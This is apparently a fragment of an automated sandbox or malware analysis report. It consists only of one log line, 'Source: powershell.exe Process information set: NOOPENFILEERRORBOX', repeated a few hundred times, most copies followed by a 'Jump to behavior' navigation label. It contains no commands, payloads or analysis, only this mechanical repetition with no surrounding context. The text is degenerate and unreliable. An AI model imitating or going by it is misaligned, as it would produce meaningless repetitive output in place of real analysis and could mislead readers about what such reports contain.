            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
